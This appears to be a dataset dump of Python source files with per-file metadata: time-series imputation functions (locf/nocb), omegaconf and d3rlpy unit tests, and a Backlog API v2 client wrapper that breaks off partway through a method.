| 35.657895 | 117 | 0.704059 | 372 | 2,710 | 4.997312 | 0.11828 | 0.074233 | 0.077461 | 0.041958 | 0.817644 | 0.783217 | 0.783217 | 0.744486 | 0.744486 | 0.744486 | 0 | 0.008854 | 0.208118 | 2,710 | 75 | 118 | 36.133333 | 0.857409 | 0.429151 | 0 | 0.363636 | 0 | 0 | 0.129643 | 0.016752 | 0 | 0 | 0 | 0 | 0 | 1 | 0.272727 | false | 0 | 0.045455 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
| fb7b368376b5efdcc142b272cee2e155e7c29ff7 | 6,798 | py | Python | imputeTSpy/locf.py | zaenalium/imputeTSpy | 7d34cdcd699606f908de6f3de17b6c6b9150091c | ["MIT"] | null | null | null | imputeTSpy/locf.py | zaenalium/imputeTSpy | 7d34cdcd699606f908de6f3de17b6c6b9150091c | ["MIT"] | null | null | null | imputeTSpy/locf.py | zaenalium/imputeTSpy | 7d34cdcd699606f908de6f3de17b6c6b9150091c | ["MIT"] | null | null | null |
import numpy as np
import pandas as pd
from check_data import check_data, consecutive
from tsAirgap import ts_airgap, ts_heating, ts_nh4
#from impyute.ops import error
#@wrapper.wrappers
#@wrapper.checks
def locf(data, na_remaining = "rev", maxgap = None):
""" Last Observation Carried Forward
    For each set of missing indices, use the value of one row before (same
column). In the case that the missing value is the first row, look one
row ahead instead. If this next row is also NaN, look to the next row.
Repeat until you find a row in this column that's not NaN. All the rows
before will be filled with this value.
Parameters
----------
data: numpy.array, list or pandas.Series
Data to impute.
    na_remaining : Method to be used for remaining nan (if missing numbers appear in the first observation) :
"keep" - to return the series with NAs
"mean" - to replace remaining NAs by overall mean
"rev" - to perform nocb / locf from the reverse direction
maxgap : Maximum number of successive NAs to still perform imputation on. Default setting is to replace all NAs without restrictions. With this option set, consecutive nan runs, that are longer than 'maxgap' will be left nan. This option mostly makes sense if you want to treat long runs of nan afterwards separately
Returns
-------
numpy.array
Imputed data.
Examples
------
import imputeTSpy
data = imputeTSpy.ts_nh4()
data_fill_locf = imputeTSpy.locf(data)
data_fill_nocb = imputeTSpy.nocb(data)
"""
data = check_data(data)
nan_xy = np.argwhere(np.isnan(data))
nan_xy_idx = np.array([x[0] for x in nan_xy])
    if maxgap is not None:
z = consecutive(nan_xy_idx)
exc = []
for i in range(len(z)) :
if len(z[i]) > maxgap :
exc.extend(z[i])
nan_xy_idx = nan_xy_idx[np.isin(nan_xy_idx, exc) == False]
else :
pass
n = data.shape[0]
n_int = np.arange(n)#[x for x in range(n)]
data_cp = data.copy()
    for i in nan_xy_idx:
        try:
            # carry the nearest earlier (last) observation forward
            cdd = n_int[n_int < i]
            idx_rep = np.max(cdd[np.isin(cdd, nan_xy_idx) == False])
            data_cp[i] = data_cp[idx_rep]
        except ValueError:  # no earlier non-missing value exists
            if na_remaining == "rev":
                cdd = n_int[n_int > i]
                idx_rep = np.min(cdd[np.isin(cdd, nan_xy_idx) == False])
                data_cp[i] = data_cp[idx_rep]
elif na_remaining == "mean":
idx_rep = np.mean(data[np.isnan(data) == False])
data_cp[i] = idx_rep
elif na_remaining == "keep":
pass
else :
raise("the option is invalid, please fill valid option!!!!")
return data_cp
def nocb(data, axis=0, na_remaining = "rev", maxgap = None):
""" Next Observation Carried Backward
    For each set of missing indices, use the value of the next row (same
    column). In the case that the missing value is in the last row, look one
    row back instead. If that row is also NaN, keep looking further back.
    Repeat until you find a row in this column that's not NaN. All the missing
    rows are filled with this value.
Parameters
----------
data: numpy.array, list or pandas.Series
Data to impute.
    na_remaining : Method to be used for remaining nan (if missing numbers appear in the last observation) :
"keep" - to return the series with NAs
"mean" - to replace remaining NAs by overall mean
"rev" - to perform nocb / locf from the reverse direction
maxgap : Maximum number of successive NAs to still perform imputation on. Default setting is to replace all NAs without restrictions. With this option set, consecutive nan runs, that are longer than 'maxgap' will be left nan. This option mostly makes sense if you want to treat long runs of nan afterwards separately
Returns
-------
numpy.ndarray
Imputed data.
Examples
------
import imputeTSpy
data = imputeTSpy.ts_nh4()
data_fill_locf = imputeTSpy.locf(data)
data_fill_nocb = imputeTSpy.nocb(data)
"""
data = check_data(data)
nan_xy = np.argwhere(np.isnan(data))
nan_xy_idx = np.array([x[0] for x in nan_xy])
    if maxgap is not None:
z = consecutive(nan_xy_idx)
exc = []
for i in range(len(z)) :
if len(z[i]) > maxgap :
exc.extend(z[i])
nan_xy_idx = nan_xy_idx[np.isin(nan_xy_idx, exc) == False]
else :
pass
n = data.shape[0]
n_int = np.arange(n)#[x for x in range(n)]
data_cp = data.copy()
    for i in nan_xy_idx:
        try:
            # carry the nearest later (next) observation backward
            cdd = n_int[n_int > i]
            idx_rep = np.min(cdd[np.isin(cdd, nan_xy_idx) == False])
            data_cp[i] = data_cp[idx_rep]
        except ValueError:  # no later non-missing value exists
            if na_remaining == "rev":
                cdd = n_int[n_int < i]
                idx_rep = np.max(cdd[np.isin(cdd, nan_xy_idx) == False])
                data_cp[i] = data_cp[idx_rep]
elif na_remaining == "mean":
idx_rep = np.mean(data[np.isnan(data) == False])
data_cp[i] = idx_rep
elif na_remaining == "keep":
pass
else :
raise("the option is invalid, please fill valid option!!!!")
return data_cp
#data = ts_nh4()
#data[-2:] =[np.nan, np.nan]
#nan_xy = np.argwhere(np.isnan(data))
#nan_xy_idx = np.array([x[0] for x in nan_xy])
#n = data.shape[0]
#n_int = np.arange(n)#[x for x in range(n)]
#
#np.diff(np.append(i, z)) != 1
#max_gap = 10
#
#
##z = nan_xy_idx[nan_xy_idx > i]
##a = np.array([0, 47, 48, 49, 50, 97, 98, 99])
#if maxgap != None :
# z = consecutive(nan_xy_idx)
# exc = []
# for i in range(len(z)) :
# if len(z[i]) > max_gap :
# exc.extend(z[i])
# nan_xy_idx = nan_xy_idx[np.isin(nan_xy_idx, exc) == False]
#else :
# pass
#
#data_cp = data.copy()
#na_remaining = "mean"
#for i in nan_xy_idx :
# try :
# cdd = n_int [n_int > i]
# idx_rep = np.min(cdd[np.isin(cdd, nan_xy_idx) == False])
# data_cp[i] = data_cp[idx_rep]
# except :
# if na_remaining == "rev" :
# cdd = n_int [n_int < i]
# idx_rep = np.max(cdd[np.isin(cdd, nan_xy_idx) == False])
# data_cp[i] = data_cp[idx_rep]
# elif na_remaining == "mean":
# idx_rep = np.nanmean(data)
# data_cp[i] = idx_rep
# elif na_remaining == "keep":
# pass
# else :
# raise("the option is invalid, please fill valid option!!!!")
#
#
#z = nan_xy_idx[nan_xy_idx > i]
| 34.160804
| 320
| 0.584437
| 1,023
| 6,798
| 3.738025
| 0.168133
| 0.044456
| 0.058577
| 0.025105
| 0.900889
| 0.888337
| 0.888337
| 0.888337
| 0.878923
| 0.878923
| 0
| 0.006367
| 0.306855
| 6,798
| 198
| 321
| 34.333333
| 0.805178
| 0.55075
| 0
| 0.916667
| 0
| 0
| 0.047324
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027778
| false
| 0.055556
| 0.055556
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
fba4a3ec34dc4ed9b13643fc80a87a6a38904d8b
| 625
|
py
|
Python
|
tests/examples/test_postponed_annotations.py
|
jeffknaide/omegaconf
|
e7f7db4c60509de068990b5af9ec30d29f1369be
|
[
"BSD-3-Clause"
] | null | null | null |
tests/examples/test_postponed_annotations.py
|
jeffknaide/omegaconf
|
e7f7db4c60509de068990b5af9ec30d29f1369be
|
[
"BSD-3-Clause"
] | null | null | null |
tests/examples/test_postponed_annotations.py
|
jeffknaide/omegaconf
|
e7f7db4c60509de068990b5af9ec30d29f1369be
|
[
"BSD-3-Clause"
] | null | null | null |
import sys
import pytest
@pytest.mark.skipif(sys.version_info < (3, 7), reason="requires Python 3.7")
def test_simple_types_class_postponed() -> None:
# import from a module which has `from __future__ import annotations`
from tests.examples.dataclass_postponed_annotations import simple_types_class
simple_types_class()
@pytest.mark.skipif(sys.version_info < (3, 7), reason="requires Python 3.7")
def test_conversions_postponed() -> None:
# import from a module which has `from __future__ import annotations`
from tests.examples.dataclass_postponed_annotations import conversions
conversions()
| 31.25 | 81 | 0.7712 | 84 | 625 | 5.452381 | 0.357143 | 0.017467 | 0.104803 | 0.082969 | 0.777293 | 0.777293 | 0.777293 | 0.777293 | 0.777293 | 0.777293 | 0 | 0.014925 | 0.1424 | 625 | 19 | 82 | 32.894737 | 0.839552 | 0.216 | 0 | 0.2 | 0 | 0 | 0.078029 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.4 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
| fbc578561bc3f1f14716f1751a6ae8f75ea26e4f | 6,248 | py | Python | tests/models/torch/test_encoders.py | YangRui2015/d3rlpy | da778b2a2b0afbafe25395296baecd0d4d0cd0d5 | ["MIT"] | 1 | 2021-05-08T06:21:05.000Z | 2021-05-08T06:21:05.000Z | tests/models/torch/test_encoders.py | YangRui2015/d3rlpy | da778b2a2b0afbafe25395296baecd0d4d0cd0d5 | ["MIT"] | null | null | null | tests/models/torch/test_encoders.py | YangRui2015/d3rlpy | da778b2a2b0afbafe25395296baecd0d4d0cd0d5 | ["MIT"] | null | null | null |
import pytest
import torch
from d3rlpy.models.torch.encoders import (
PixelEncoder,
PixelEncoderWithAction,
VectorEncoder,
VectorEncoderWithAction,
)
from .model_test import check_parameter_updates
@pytest.mark.parametrize("shapes", [((4, 84, 84), 3136)])
@pytest.mark.parametrize("filters", [[(32, 8, 4), (64, 4, 2), (64, 3, 1)]])
@pytest.mark.parametrize("feature_size", [512])
@pytest.mark.parametrize("batch_size", [32])
@pytest.mark.parametrize("use_batch_norm", [False, True])
@pytest.mark.parametrize("dropout_rate", [None, 0.2])
@pytest.mark.parametrize("activation", [torch.relu])
def test_pixel_encoder(
shapes,
filters,
feature_size,
batch_size,
use_batch_norm,
dropout_rate,
activation,
):
observation_shape, linear_input_size = shapes
encoder = PixelEncoder(
observation_shape=observation_shape,
filters=filters,
feature_size=feature_size,
use_batch_norm=use_batch_norm,
dropout_rate=dropout_rate,
activation=activation,
)
x = torch.rand((batch_size,) + observation_shape)
y = encoder(x)
# check output shape
assert encoder._get_linear_input_size() == linear_input_size
assert y.shape == (batch_size, feature_size)
# check use of batch norm
encoder.eval()
eval_y = encoder(x)
if use_batch_norm or dropout_rate:
assert not torch.allclose(y, eval_y)
else:
assert torch.allclose(y, eval_y)
# check layer connection
check_parameter_updates(encoder, (x,))
@pytest.mark.parametrize("shapes", [((4, 84, 84), 3136)])
@pytest.mark.parametrize("action_size", [2])
@pytest.mark.parametrize("filters", [[(32, 8, 4), (64, 4, 2), (64, 3, 1)]])
@pytest.mark.parametrize("feature_size", [512])
@pytest.mark.parametrize("batch_size", [32])
@pytest.mark.parametrize("use_batch_norm", [False, True])
@pytest.mark.parametrize("dropout_rate", [None, 0.2])
@pytest.mark.parametrize("discrete_action", [False, True])
@pytest.mark.parametrize("activation", [torch.relu])
def test_pixel_encoder_with_action(
shapes,
action_size,
filters,
feature_size,
batch_size,
use_batch_norm,
dropout_rate,
discrete_action,
activation,
):
observation_shape, linear_input_size = shapes
encoder = PixelEncoderWithAction(
observation_shape=observation_shape,
action_size=action_size,
filters=filters,
feature_size=feature_size,
use_batch_norm=use_batch_norm,
dropout_rate=dropout_rate,
discrete_action=discrete_action,
activation=activation,
)
x = torch.rand((batch_size,) + observation_shape)
if discrete_action:
action = torch.randint(0, action_size, size=(batch_size, 1))
else:
action = torch.rand((batch_size, action_size))
y = encoder(x, action)
# check output shape
assert encoder._get_linear_input_size() == linear_input_size + action_size
assert y.shape == (batch_size, feature_size)
# check use of batch norm
encoder.eval()
eval_y = encoder(x, action)
if use_batch_norm or dropout_rate:
assert not torch.allclose(y, eval_y)
else:
assert torch.allclose(y, eval_y)
# check layer connection
check_parameter_updates(encoder, (x, action))
@pytest.mark.parametrize("observation_shape", [(100,)])
@pytest.mark.parametrize("hidden_units", [[256, 256]])
@pytest.mark.parametrize("batch_size", [32])
@pytest.mark.parametrize("use_batch_norm", [False, True])
@pytest.mark.parametrize("dropout_rate", [None, 0.2])
@pytest.mark.parametrize("use_dense", [False, True])
@pytest.mark.parametrize("activation", [torch.relu])
def test_vector_encoder(
observation_shape,
hidden_units,
batch_size,
use_batch_norm,
dropout_rate,
use_dense,
activation,
):
encoder = VectorEncoder(
observation_shape=observation_shape,
hidden_units=hidden_units,
use_batch_norm=use_batch_norm,
dropout_rate=dropout_rate,
use_dense=use_dense,
activation=activation,
)
x = torch.rand((batch_size,) + observation_shape)
y = encoder(x)
# check output shape
assert encoder.get_feature_size() == hidden_units[-1]
assert y.shape == (batch_size, hidden_units[-1])
# check use of batch norm
encoder.eval()
eval_y = encoder(x)
if use_batch_norm or dropout_rate:
assert not torch.allclose(y, eval_y)
else:
assert torch.allclose(y, eval_y)
# check layer connection
check_parameter_updates(encoder, (x,))
@pytest.mark.parametrize("observation_shape", [(100,)])
@pytest.mark.parametrize("action_size", [2])
@pytest.mark.parametrize("hidden_units", [[256, 256]])
@pytest.mark.parametrize("batch_size", [32])
@pytest.mark.parametrize("use_batch_norm", [False, True])
@pytest.mark.parametrize("dropout_rate", [None, 0.2])
@pytest.mark.parametrize("use_dense", [False, True])
@pytest.mark.parametrize("discrete_action", [False, True])
@pytest.mark.parametrize("activation", [torch.relu])
def test_vector_encoder_with_action(
observation_shape,
action_size,
hidden_units,
batch_size,
use_batch_norm,
dropout_rate,
use_dense,
discrete_action,
activation,
):
encoder = VectorEncoderWithAction(
observation_shape=observation_shape,
action_size=action_size,
hidden_units=hidden_units,
use_batch_norm=use_batch_norm,
dropout_rate=dropout_rate,
use_dense=use_dense,
discrete_action=discrete_action,
activation=activation,
)
x = torch.rand((batch_size,) + observation_shape)
if discrete_action:
action = torch.randint(0, action_size, size=(batch_size, 1))
else:
action = torch.rand((batch_size, action_size))
y = encoder(x, action)
# check output shape
assert encoder.get_feature_size() == hidden_units[-1]
assert y.shape == (batch_size, hidden_units[-1])
# check use of batch norm
encoder.eval()
eval_y = encoder(x, action)
if use_batch_norm or dropout_rate:
assert not torch.allclose(y, eval_y)
else:
assert torch.allclose(y, eval_y)
# check layer connection
check_parameter_updates(encoder, (x, action))
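# Hedged usage sketch (added; not part of the original test module): a single
# non-parametrized smoke run of PixelEncoder, mirroring one grid point of
# test_pixel_encoder above. It reuses the PixelEncoder signature exactly as
# exercised by the tests in this file.
def _smoke_pixel_encoder():
    encoder = PixelEncoder(
        observation_shape=(4, 84, 84),
        filters=[(32, 8, 4), (64, 4, 2), (64, 3, 1)],
        feature_size=512,
        use_batch_norm=False,
        dropout_rate=None,
        activation=torch.relu,
    )
    x = torch.rand((32, 4, 84, 84))
    # forward pass produces one feature vector per batch element
    assert encoder(x).shape == (32, 512)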
| 29.752381
| 78
| 0.68822
| 785
| 6,248
| 5.217834
| 0.095541
| 0.078125
| 0.164063
| 0.037109
| 0.899414
| 0.899414
| 0.899414
| 0.899414
| 0.847656
| 0.822754
| 0
| 0.018354
| 0.18902
| 6,248
| 209
| 79
| 29.894737
| 0.790014
| 0.042093
| 0
| 0.877193
| 0
| 0
| 0.060616
| 0
| 0
| 0
| 0
| 0
| 0.093567
| 1
| 0.023392
| false
| 0
| 0.023392
| 0
| 0.046784
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f7efe82255fe75dd3c26f5fbb39c2ef16afa0d50
| 73,707
|
py
|
Python
|
bklv2/api.py
|
etecor/bklv2
|
aa4373ed51c3bade65c78e41921261f233e39a7f
|
[
"MIT"
] | null | null | null |
bklv2/api.py
|
etecor/bklv2
|
aa4373ed51c3bade65c78e41921261f233e39a7f
|
[
"MIT"
] | null | null | null |
bklv2/api.py
|
etecor/bklv2
|
aa4373ed51c3bade65c78e41921261f233e39a7f
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import datetime
import shutil
import requests
import json
import rfc6266
def _gpath( path ):
"""
"https://test.backlog.jp/" -> "https://test.backlog.jp/"
"https://test.backlog.jp" -> "https://test.backlog.jp/"
"""
if path == "":
return "./"
elif path.endswith( "/" ):
return path
else:
return path + "/"
def _addkw( dic, k, w ):
"""
dic[] -> dic[k] = w
"""
    if w is not None:
        if isinstance( w, ( tuple, list ) ):
            # w is a sequence of (name, value) pairs -> dic["k[name]"] = value
            for i, v in w:
                _addkw( dic, k + "[" + i + "]", v )
        elif isinstance( w, bool ):
            # Backlog expects lowercase string booleans in query/form data
            dic[k] = "true" if w else "false"
elif isinstance( w, datetime.date ):
dic[k] = w.strftime( "%Y-%m-%d" )
else:
dic[k] = w
def _addkws( dic, k, w ):
"""
dic[] -> dic[k[]] = w[]
"""
    if w is not None:
        if isinstance( w, ( tuple, list ) ):
            for i, v in enumerate( w ):
                _addkw( dic, k + "[" + str(i) + "]", v )
else:
_addkw( dic, k + "[0]", w )
def _dicset( dic, k, w, tuples ):
    # keys listed in `tuples` are plural list parameters: drop the trailing
    # "s" and expand the value into k[0], k[1], ... style query keys
    for t in tuples:
        if k == t:
            _addkws( dic, k[0:-1], w )
            return
    _addkw( dic, k, w )
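# Illustration (added comment, not original code) of how the helpers above
# flatten values into Backlog-style query keys:
#   _addkw({}, "count", 20)                        -> {"count": 20}
#   _addkw({}, "archived", True)                   -> {"archived": "true"}
#   _addkws({}, "id", [1, 2])                      -> {"id[0]": 1, "id[1]": 2}
#   _dicset({}, "projectIds", [5], ["projectIds"]) -> {"projectId[0]": 5}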
class api( object ):
"""
Backlog API version 2 wrapper
"""
def __init__( self, hostname, apikey ):
"""
hostname: "https://[spacename].backlog.jp"
apikey: "nWdhOFxDpAlsFTGSIHisRkUvTq5eTiBDBJ0FFqAdtLTSIvKpfkvb09Kteststring"
"""
if hostname.endswith( "/" ):
self.hostname = hostname.rstrip("/")
else:
self.hostname = hostname
self.apikey = apikey
def _makeurl( self, path ):
return self.hostname + path
def _api_return( self, response, **kwargs ):
self.response = response
output="json"
dir_path = "./"
for k, v in kwargs.items():
if k == "output":
output = v
elif k == "dirpath":
dirpath = v
if output == "json":
try:
return json.loads( self.response.text )
            except ValueError:
                # body was not valid JSON
                return {}
elif output == "response":
return response
elif output == "path":
if response.status_code == 200:
rr = rfc6266.parse_requests_response( response )
p = _gpath( dirpath ) + rr.filename_unsafe
with open( p, 'wb' ) as fp:
response.raw.decode_content = True
shutil.copyfileobj( response.raw, fp )
return p
return self.response.text
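    # _api_return output modes (summary comment, added):
    #   output="json"     -> parsed JSON dict ({} if the body is not JSON)
    #   output="response" -> the raw requests.Response object
    #   output="path"     -> streams the download into dirpath and returns the
    #                        local file path (falls through to response.text
    #                        on a non-200 status)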
def getSpace( self ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-space
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/space" )
return self._api_return(
requests.get( url, params = params ) )
def getRecentUpdates( self,
activityTypeIds = None,
minId = None,
maxId = None,
count = None,
order = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-recent-updates
"""
params = { "apiKey": self.apikey }
_addkws( params, "activityTypeId", activityTypeIds )
_addkw( params, "minId", minId )
_addkw( params, "maxId", maxId )
_addkw( params, "count", count )
_addkw( params, "order", order )
url = self._makeurl( "/api/v2/space/activities" )
return self._api_return(
requests.get( url, params = params ) )
def getSpaceLogo( self,
output = "path",
dirpath = "." ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-space-logo
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/space/image" )
return self._api_return(
requests.get( url, params = params, stream = True ),
output = output,
dirpath = dirpath )
def getSpaceNotification( self ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-space-notification
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/space/notification" )
return self._api_return(
requests.get( url, params = params ) )
def updateSpaceNotification( self, content ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-space-notification
"""
params = { "apiKey": self.apikey }
data = { "content": content }
url = self._makeurl( "/api/v2/space/notification" )
return self._api_return(
requests.put( url, params = params, data = data ) )
def getSpaceDiskUsage( self ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-space-disk-usage
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/space/diskUsage" )
return self._api_return(
requests.get( url, params = params ) )
def postAttachmentFile( self, filepath ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/post-attachment-file
"""
params = { "apiKey": self.apikey }
fp = open( filepath, "rb" )
files = { "file": [ requests.utils.guess_filename( fp ),
fp.read(),
"application/octet-stream" ] }
fp.close()
url = self._makeurl( "/api/v2/space/attachment" )
return self._api_return(
requests.post( url, params = params, files = files ) )
def getUserList( self ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-user-list
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/users" )
return self._api_return(
requests.get( url, params = params ) )
def getUser( self, userId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-user
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/users/" + str( userId ) )
return self._api_return(
requests.get( url, params = params ) )
def addUser( self, userId, password, name, mailAddress, roleType ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-user
"""
params = { "apiKey": self.apikey }
data = { "userId": userId, "password": password, "name": name,
"mailAddress": mailAddress, "roleType": roleType }
url = self._makeurl( "/api/v2/users" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def updateUser( self, userId,
password = None,
name = None,
mailAddress = None,
roleType = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-user
"""
params = { "apiKey": self.apikey }
data = {}
_addkw( data, "password", password )
_addkw( data, "name", name )
_addkw( data, "mailAddress", mailAddress )
_addkw( data, "roleType", roleType )
url = self._makeurl( "/api/v2/users/" + str( userId ) )
return self._api_return(
requests.patch( url, params = params, data = data ) )
def deleteUser( self, userId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-user
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/users/" + str( userId ) )
return self._api_return(
requests.delete( url, params = params ) )
def getOwnUser( self ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-own-user
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/users/myself" )
return self._api_return(
requests.get( url, params = params ) )
def getUserIcon( self, userId,
output = "path",
dirpath = "." ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-user-icon
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/users/" + str( userId ) + "/icon" )
return self._api_return(
requests.get( url, params = params, stream = True ),
output = output,
dirpath = dirpath )
def getUserRecentUpdates( self, userId,
activityTypeIds = None,
minId = None,
maxId = None,
count = None,
order = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-user-recent-updates
"""
params = { "apiKey": self.apikey }
_addkws( params, "activityTypeIds", activityTypeIds )
_addkw( params, "minId", minId )
_addkw( params, "maxId", maxId )
_addkw( params, "count", count )
_addkw( params, "order", order )
url = self._makeurl( "/api/v2/users/" + str( userId ) + "/activities" )
return self._api_return(
requests.get( url, params = params ) )
def getReceivedStarList( self, userId,
minId = None,
maxId = None,
count = None,
order = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-received-star-list
"""
params = { "apiKey": self.apikey }
_addkw( params, "minId", minId )
_addkw( params, "maxId", maxId )
_addkw( params, "count", count )
_addkw( params, "order", order )
url = self._makeurl( "/api/v2/users/" + str( userId ) + "/stars" )
return self._api_return(
requests.get( url, params = params ) )
def countUserReceivedStars( self, userId,
since = None,
until = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/count-user-received-stars
"""
params = { "apiKey": self.apikey }
_addkw( params, "since", since )
_addkw( params, "until", until )
url = self._makeurl( "/api/v2/users/" + str( userId ) + "/stars/count" )
return self._api_return(
requests.get( url, params = params ) )
def getListOfRecentlyViewedIssues( self,
order = None,
offset = None,
count = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-recently-viewed-issues
"""
params = { "apiKey": self.apikey }
_addkw( params, "order", order )
_addkw( params, "offset", offset )
_addkw( params, "count", count )
url = self._makeurl( "/api/v2/users/myself/recentlyViewedIssues" )
return self._api_return(
requests.get( url, params = params ) )
def getListOfRecentlyViewedProjects( self,
order = None,
offset = None,
count = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-recently-viewed-projects
"""
params = { "apiKey": self.apikey }
_addkw( params, "order", order )
_addkw( params, "offset", offset )
_addkw( params, "count", count )
url = self._makeurl( "/api/v2/users/myself/recentlyViewedProjects" )
return self._api_return(
requests.get( url, params = params ) )
def getListOfRecentlyViewedWikis( self,
order = None,
offset = None,
count = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-recently-viewed-wikis
"""
params = { "apiKey": self.apikey }
_addkw( params, "order", order )
_addkw( params, "offset", offset )
_addkw( params, "count", count )
url = self._makeurl( "/api/v2/users/myself/recentlyViewedWikis" )
return self._api_return(
requests.get( url, params = params ) )
def getListOfGroups( self,
order = None,
offset = None,
count = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-list-of-groups
"""
params = { "apiKey": self.apikey }
_addkw( params, "order", order )
_addkw( params, "offset", offset )
_addkw( params, "count", count )
url = self._makeurl( "/api/v2/groups" )
return self._api_return(
requests.get( url, params = params ) )
def addGroup( self, name,
members = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-group
"""
params = { "apiKey": self.apikey }
data = { "name": name }
_addkws( data, "members", members )
url = self._makeurl( "/api/v2/groups" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def getGroup( self, groupId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-group
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/groups/" + str( groupId ) )
return self._api_return(
requests.get( url, params = params ) )
def updateGroup( self, groupId,
name = None,
members = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-group
"""
params = { "apiKey": self.apikey }
data = {}
_addkw( data, "name", name )
_addkws( data, "members", members )
url = self._makeurl( "/api/v2/groups/" + str( groupId ) )
return self._api_return(
requests.patch( url, params = params, data = data ) )
def deleteGroup( self, groupId ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/delete-group
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/groups/" + str( groupId ) )
return self._api_return(
requests.delete( url, params = params ) )
def getStatusList( self ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-status-list
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/statuses" )
return self._api_return(
requests.get( url, params = params ) )
def getResolutionList( self ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-resolution-list
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/resolutions" )
return self._api_return(
requests.get( url, params = params ) )
def getPriorityList( self ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-priority-list
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/priorities" )
return self._api_return(
requests.get( url, params = params ) )
def getProjectList( self,
archived = None,
all = False ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-project-list
"""
params = { "apiKey": self.apikey }
_addkw( params, "archived", archived )
_addkw( params, "all", all )
url = self._makeurl( "/api/v2/projects" )
return self._api_return(
requests.get( url, params = params ) )
def addProject( self, name, key, chartEnabled, subtaskingEnabled, textFormattingRule,
projectLeaderCanEditProjectLeader = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/add-project
"""
params = { "apiKey": self.apikey }
data = { "name": name, "key": key }
_addkw( data, "chartEnabled", chartEnabled )
_addkw( data, "subtaskingEnabled", subtaskingEnabled )
_addkw( data, "textFormattingRule", textFormattingRule )
_addkw( data, "projectLeaderCanEditProjectLeader", projectLeaderCanEditProjectLeader )
url = self._makeurl( "/api/v2/projects" )
return self._api_return(
requests.post( url, params = params, data = data ) )
def getProject( self, projectIdOrKey ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/get-project
"""
params = { "apiKey": self.apikey }
url = self._makeurl( "/api/v2/projects/" ) + str( projectIdOrKey )
return self._api_return(
requests.get( url, params = params ) )
def updateProject( self, projectIdOrKey,
name = None,
key = None,
chartEnabled = None,
subtaskingEnabled = None,
projectLeaderCanEditProjectLeader = None,
textFormattingRule = None,
archived = None ):
"""
https://developer.nulab-inc.com/docs/backlog/api/2/update-project
"""
params = { "apiKey": self.apikey }
data = {}
_addkw( data, "name", name )
_addkw( data, "key", key )
